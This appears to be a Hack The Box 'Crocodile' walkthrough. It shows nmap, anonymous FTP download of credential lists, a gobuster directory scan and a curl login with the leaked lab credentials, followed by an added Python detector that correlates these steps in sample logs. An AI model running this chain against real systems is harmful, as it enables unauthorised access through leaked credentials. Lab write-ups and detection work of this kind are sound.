HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag
keyfive5 / Obsidian Signal

Publish Date: Apr 21

Introduction

In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.

You’ll learn to:

  • Enumerate FTP and download leaked credential files
  • Extract valid usernames/passwords
  • Use Gobuster to discover hidden web pages
  • Authenticate to a PHP login panel and capture the flag

Prerequisites

  • Kali Linux (or any distro with ftp, gobuster, curl)
  • HTB VPN connection

1. FTP Enumeration

nmap -sC -sV -p 21,80 <IP>
ftp <IP>
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd

Inspect the lists:

cat allowed.userlist
cat allowed.userlist.passwd

2. Extract Credentials

Match the entries in allowed.userlist against those in allowed.userlist.passwd to find a valid pair (e.g. admin / Supersecretpassword1).

3. Discover Hidden Pages

gobuster dir \
  --url http://<IP>/ \
  --wordlist /usr/share/wordlists/dirb/common.txt \
  -x php,html

Look for /login.php.

4. Admin Login & Flag

curl -d "username=admin&password=Supersecretpassword1" \
     http://<IP>/login.php

You’ll be redirected to the Admin panel—your flag is displayed at the top.


5. Lessons Learned

  • Anonymous services often leak credentials.
  • Combine leaked creds with web enumeration for full-chain exploits.
  • Automate with scripts in professional engagements.
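As a defensive counterpart to steps 1 to 4 above, here is an added example (written for this page, not code from the original write-up or its repo) that correlates the chain's footprints in server logs: a credential-looking file fetched over anonymous FTP, a burst of 404s from directory brute forcing, and a POST to a login page, all from one client IP. The vsftpd and Apache log lines are constructed samples approximating those formats, and the file-name keywords and 404 threshold are assumptions.

```python
"""Correlate the Crocodile-style chain in logs: anonymous-FTP download of a
credential-looking file, then a 404 burst, then a POST to a login page (same IP)."""
import re
from collections import defaultdict

# Constructed sample lines approximating vsftpd's log format (not real captures).
FTP_LOG = """\
Mon Apr 21 10:00:01 2025 [pid 1201] [anonymous] OK LOGIN: Client "10.10.14.5", anon password "?"
Mon Apr 21 10:00:04 2025 [pid 1203] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/allowed.userlist", 33 bytes, 1.20Kbyte/sec
Mon Apr 21 10:00:06 2025 [pid 1203] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/allowed.userlist.passwd", 62 bytes, 2.10Kbyte/sec
Mon Apr 21 10:00:09 2025 [pid 1210] [ftp] OK DOWNLOAD: Client "10.10.14.9", "/README.txt", 12 bytes, 0.50Kbyte/sec
"""
# Constructed sample lines in Apache combined log format (not real captures).
WEB_LOG = """\
10.10.14.5 - - [21/Apr/2025:10:02:00 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.5 - - [21/Apr/2025:10:02:00 +0000] "GET /backup.php HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.5 - - [21/Apr/2025:10:02:01 +0000] "GET /config.html HTTP/1.1" 404 275 "-" "gobuster/3.6"
10.10.14.5 - - [21/Apr/2025:10:02:01 +0000] "GET /login.php HTTP/1.1" 200 1023 "-" "gobuster/3.6"
10.10.14.5 - - [21/Apr/2025:10:03:30 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "curl/8.5.0"
10.10.14.9 - - [21/Apr/2025:10:03:31 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

FTP_DL = re.compile(r'\[ftp\] OK DOWNLOAD: Client "([\d.]+)", "([^"]+)"')
WEB_REQ = re.compile(r'^([\d.]+) .*? "(GET|POST) (\S+) [^"]*" (\d{3})')
SENSITIVE = ("passwd", "userlist", "shadow", "cred")  # assumed file-name keywords worth alerting on

def correlate(ftp_log, web_log, min_404=3):
    """Return {ip: findings} for clients that completed all three stages of the chain."""
    ftp_files, not_found, login_posts = defaultdict(list), defaultdict(int), defaultdict(list)
    for line in ftp_log.splitlines():
        m = FTP_DL.search(line)
        if m and any(k in m.group(2).lower() for k in SENSITIVE):
            ftp_files[m.group(1)].append(m.group(2))      # stage 1: leaked-file download
    for line in web_log.splitlines():
        m = WEB_REQ.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        if status == "404":
            not_found[ip] += 1                             # stage 2: brute-force signal
        elif method == "POST" and "login" in path.lower():
            login_posts[ip].append(path)                   # stage 3: credential use
    return {ip: {"ftp_files": files, "http_404": not_found[ip], "login_posts": login_posts[ip]}
            for ip, files in ftp_files.items()
            if not_found[ip] >= min_404 and login_posts[ip]}

if __name__ == "__main__":
    for ip, hit in correlate(FTP_LOG, WEB_LOG).items():
        print(f"ALERT {ip}: {hit}")
```

Only the client that completed all three stages is reported; the second IP, which fetched a harmless file and browsed normally, is not.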

🔗 Repo & full write‑up: https://github.com/keyfive5/obsidiansignal-htb-crocodile
